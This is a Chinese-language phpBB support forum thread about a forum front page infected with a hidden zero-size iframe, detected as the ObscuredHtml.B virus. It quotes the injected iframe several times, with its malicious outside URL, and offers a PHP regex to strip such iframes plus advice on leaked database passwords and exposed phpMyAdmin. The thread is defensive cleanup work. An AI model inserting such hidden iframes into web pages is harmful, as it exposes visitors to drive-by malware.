我的已經更新到2.0.15
但是這兩星期遇到\r
這樣的情形兩次了
<iframe src="http://gamania.go.zccn.net/x/hinet.htm" width=0 height=0 frameborder=0></iframe>
首頁被放入這樣的東西
不知道是如何被植入,有辦法直接針對這個漏洞做更新嗎?
[問題] 我的論壇會跳ObscuredHtml.B病毒
版主: 版主管理群
版面規則
本區是討論關於 phpBB 2.0.X 架設安裝上的問題,只要有安裝任何外掛,請到外掛討論相關版面按照公告格式發表。
(發表文章請按照公告格式發表,違者砍文)
本區是討論關於 phpBB 2.0.X 架設安裝上的問題,只要有安裝任何外掛,請到外掛討論相關版面按照公告格式發表。
(發表文章請按照公告格式發表,違者砍文)
不過這樣子就不能在版面說明使用其它的html語法了
其實可以考慮用preg_replace()來將整個寬度為0的iframe置換成空字串\r
例如底下的例子
其實可以考慮用preg_replace()來將整個寬度為0的iframe置換成空字串\r
例如底下的例子
代碼: 選擇全部
$str = '版<IFrame src="http://gamania.go.zccn.net/x/hinet.htm" width=0 height=0 frameborder=0></iframe>面說<iframe src="http://gamania.go.zccn.net/x/hinet.htm" width=0 height=0 frameborder=0></iframe>明';
$str = preg_replace("/<iframe(.*?)width=[\"']?0[\"']?(.*?)><\/iframe>/im", '', $str);
echo $str;
應該不是\rt2737986 寫:嗯嗯...你的資料庫密碼外洩了...那個不是寫到檔案..是直接從資料庫下手...
更新為英數亂碼的密碼....還有主機內的所有帳號密碼通通改掉吧...
PS: 有更改過資料庫密碼 config.php 檔裡面的密碼也要改喔..不然會造成無法連結資料庫..因為 config.php 跟資料庫的密碼不對..試試吧...祝好運...
去google查詢一下
有不少網站遇害,遇害的論壇有vbb跟phpbb兩種
http://www.google.com.tw/search?q=gaman ... art=0&sa=N
我猜想應該也是跟之前一樣\r
利用搜尋引擎,在網路上找尋vbb跟phpbb論壇,找漏洞下手
應該要盡快找出漏洞修正
一般來說 會在首頁連結病毒 都是在首頁的主題分類的地方 被不明人士加入了
連結...可到版面管理找尋 那個版面被加入了不明連結~~
為何會被加入 我猜想是大家都喜歡把 phpmyadmin 放在網頁上又不加以保護\r
才會讓不明人士 可以順利在資料庫中加入不明連結...
連結...可到版面管理找尋 那個版面被加入了不明連結~~
為何會被加入 我猜想是大家都喜歡把 phpmyadmin 放在網頁上又不加以保護\r
才會讓不明人士 可以順利在資料庫中加入不明連結...
對Red Hat Linux還是一位新手..
但決不會因為難而放棄的
越是難搞越有興趣~^.^~
歡迎參觀我的網站
http://www.snailtown.idv.tw/
●架設主機作業系統:Linux
●網站連結: http://www.snailtown.idv.tw/
●您的上網方式:ADSL
●您安裝的程式:Apache + php + MySql
●您的 phpBB2 版本:2.015
但決不會因為難而放棄的
越是難搞越有興趣~^.^~
歡迎參觀我的網站
http://www.snailtown.idv.tw/
●架設主機作業系統:Linux
●網站連結: http://www.snailtown.idv.tw/
●您的上網方式:ADSL
●您安裝的程式:Apache + php + MySql
●您的 phpBB2 版本:2.015